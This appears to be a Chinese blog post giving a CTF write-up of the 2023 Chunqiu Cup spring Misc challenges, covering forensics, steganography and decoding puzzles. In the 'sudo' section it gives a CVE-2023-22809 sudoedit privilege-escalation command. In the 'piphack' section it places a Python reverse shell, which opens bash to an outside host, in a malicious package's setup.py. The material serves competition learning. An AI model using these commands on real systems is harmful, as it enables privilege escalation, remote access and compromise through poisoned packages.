2023年春秋杯网络安全联赛春季赛Misc-AK

最新推荐文章于 2023-06-07 07:30:00 发布
最新推荐文章于 2023-06-07 07:30:00 发布
阅读量1.5k 收藏 7
点赞数 3
文章标签: 网络安全 python linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43647197/article/details/130775040
版权

sudo

CVE-2023-22809

没有vim vi,就用原生编辑器nano
EDITOR='nano -- /flag' sudoedit /etc/GAMELAB

piphack

可以下载任意包,考虑构造恶意的包,让他去下载

直接在setup下写反弹shell

 import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('xx',8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);

给目录tar一下

tar -czvf file.tar.gz evalp/

 wordle

猜单词

 盲人隐藏了起来

补文件头得压缩包密码

 图片尾部有个key

Keyischunqiu123

*Crypto Tips/Tools – AACC CYBER COMPETITION PRACTICE

搜索到Steg的tools

 happy2forensics

提示:捕获源端口为20,目的端口为80的TCP流量,可以获得bitlocker密码

 tcp.port == 20 &&tcp.dstport==80

 

 找到密钥

bitlocker:120483-350966-299189-055297-225478-133463-431684-359403

大文件压缩包 导出看看

刚才的密钥恢复挂载

 

脚本合成图片 

除了图片外还有两个异常文件

 foremost分离210-1.png文件,得到一张jpg和很多png文件,发现jpg文件有两个jpg头,删掉前面一个jpg头得到第一个flag

 用脚本或者工具拼接分离的很多png文件,得到一串password

 用DiskGenius文件挂载找到可疑压缩包,得到flag2.txt

用得到的password去解压缩包得到flag2

 58与64

文档内的先base58解密,在拼接解密base64

base58_chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
base58_vals = {c: v for v, c in enumerate(base58_chars)}

def decode_base58(enc):
    num = 0
    for c in enc:
        num *= 58
        num += base58_vals[c]
    return num.to_bytes((num.bit_length() + 7) // 8, 'big')

for i in range(14268):
    with open(f"./tmp_dc7fe258d0d39f50f605eb64cc8189eb-1/{i}.txt", "r") as f:
        data = f.read().splitlines()
        dec = decode_base58(data[0])
        print(dec)
        with open('flag.txt',"a") as f:
            f.write(dec.decode())

import base64
with open('flag.txt', 'r') as f:
    data = f.read()
def decode(data):
    try:
        dec = base64.b64decode(data)
        print(f'解密后:{dec}')
        decode(dec)
    except Exception:
        pass
decode(data)

 

 

 

Y0ng778
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
2023年春秋网络安全联赛春季 RE复盘(部分待补)
qq_66633020的博客
05-25 989
这次的春季仍是被打爆了,re只做出了一题,发现自己还是太菜了,好在在后期复盘中又收获了许多新知识了,不亏。
2021年“绿城杯”网络安全
09-30
2021年“绿城杯”网络安全是一场聚焦网络安全技术的竞技活动,旨在提升参者在信息安全领域的专业技能,增强社会对网络安全的重视。CTF(Capture The Flag)是网络安全的一种形式,参团队通过解决一系列...
2023春秋春季WP-REVERSE(AK)
m0_68757308的博客
05-19 1737
2023春秋春季WP-REVERSE(AK)
2023年春秋网络安全联赛春季writup
渗透测试研究中心
06-07 464
Re Emoji Connect 是Excel的插件,开始玩之后会初始化一个4848的矩阵,每个格子里有一个emoji,然后每次点击两个格子,如果两个格子里的emoji相同,就会消除这两个格子。一开始以为是消星星一类的三个格子的消除,但看game的逻辑每次只替换两个,所以确实是连连看。然后flag的逻辑就是每次消除的时候减去格子的 行列,下标是用神奇的方法从unicode转过去的,我这里直接用...
2023年春秋网络安全联赛春季Reverse题目复现
OrientalGlass的博客
05-30 1299
下方的call sun_7f006f7c2536就是主函数,跟进重新识别即可看到逻辑(这里不做详细介绍,以选项2为主)往上翻找到起始地址,对loc_loc_7F3BB0FB6536按p识别为函数就可以看到主函数逻辑了。然后还有一些没有被正确识别的函数,需要手动跟进按p识别为函数,然后回到反汇编界面按f5重新识别即可。另外两块红色区域同理,重新识别后可以看到主函数(如果看不到那就对tea函数交叉引用向上找)一直按f7,最后可以发现程序会卡住,并且还能看见InputFlag字符串,这里就是主函数了。
2023年春秋网络安全联赛 春季 wp
akxnxbshai的博客
05-19 1968
2023年春秋网络安全联赛春季 wp
中国电信2023巅峰极客网络安全技能挑战的一道Misc题目
最新发布
07-22
中国电信2023巅峰极客网络安全技能挑战的一道Misc题目
2023年内蒙古自治区中职网络安全题-B模块
06-01
2023年内蒙古自治区的中职网络安全,旨在考察参者对Web安全、系统安全、Misc安全以及数据分析等多方面的能力。对于参者而言,这不仅是一次技术检验,更是一次提升个人技能和拓宽知识视野的宝贵机会。 B模块...
“东华杯”2021年大学生网络安全邀请.zip
12-07
"东华杯"2021年大学生网络安全邀请是一场旨在提高大学生网络安全技能和意识的重要事。CTF,即Capture The Flag,是网络安全领域的一种竞形式,参者需要运用各种安全技能解决难题,捕获特定的目标("flag")...
2022年网络安全中山市香山杯misc题目附件
11-01
2022年网络安全中山市香山杯misc题目附件
2023春秋春季Crypto方向全解
qq_41626232的博客
05-19 1932
2023春秋春季Crypto wp 全解 侥幸ak了 checkin 题目 from Crypto.Util.number import * # from secret import flag, x, y flag=b'flag{????????????}' def keygen(nbit): p, q = [getPrime(nbit) for _ in range(2)] return (p, q) p, q = keygen(1024) n = p * q t = len(
春秋杯2023萌新记录WP
m0_60088863的博客
05-30 469
萌新记录第一次打ctf比,很新很新的辣种!!
[春秋杯2023]Misc sudo(记CVE-2023-22809)
Leaf_initial的博客
05-20 287
sudo使用用户提供的环境变量让用户选择他们所选择的编辑器。的内容其中一个变量扩展了传递给函数的实际命令。然而,后者依赖于--参数的存在来确定要编辑的文件列表。注入在一个已授权的环境变量中使用额外的--参数可以更改此列表并导致特权通过编辑具有RunAs用户权限的任何其他文件来升级。这个问题发生在sudoers之后。
2022年春秋网络安全联赛春季 勇者山峰部分WP
大雾
05-08 2341
Misc 签到 题目描述:题目内容:因为疫情,有多久没听到上课铃声了。 (如果你还不知道怎么签到,关注“春秋伽玛”公众号,回复“上课铃声”可以拿到进一步提示) 关注公众号回复上课铃声得到 照着按就完了 最终按对会出个弹框跳转到有flag的页面 flag{27033a89-55dd-46dc-82b9-cd89a4da957d} tiger 题目描述:无 从中可以发现因此: ag2a`f76 是 rot47 加密,解密为:28a217fe rot47解密 PNG 图片是 LSB 加密lsb解密工具 解.
2022年春秋网络安全联赛春季勇者山峰密码部分wp
mxx307的博客
05-08 2667
2022年春秋网络安全联赛春季勇者山峰部分wp Crypto bob’s enc bob自己编写了一套加密算法,但是在加密的过程中,似乎混入了一些噪音,你能帮助他恢复出明文吗? 题目 #python2 from secret import * import random prime = 2141 print len(flag) flag = map(ord, flag) flag1 = flag[:21] flag2 = flag[21:] row = 64 def add(msg1, msg
2022年春秋网络安全联赛春季 勇者山峰
shinygod的博客
05-08 1367
Mercy-code if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd))这个过滤就代表了是无参rce。 <?php highlight_file(__FILE__); if ($_POST['cmd']) { $cmd = $_POST['cmd']; if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) { echo chr(strrev(un
2022年春秋网络安全联赛春季勇者山峰-Mercy-code[WEB]
as you know, nlp is fantasitc!
05-09 973
Mercy-code 这道题参考这篇博客 打开环境,很明显的无参数rce类型的题 思路一 读文件,一般是要构造 . … / 能改变目录,进行文件读取 思路二 RCE,可以利用请求头里面的字段等传入命令 <?php highlight_file(__FILE__); if ($_POST['cmd']) { $cmd = $_POST['cmd']; if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) {
2023年春秋杯 pwn
m0_63437215的博客
05-23 1333
2023春秋杯pwn
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值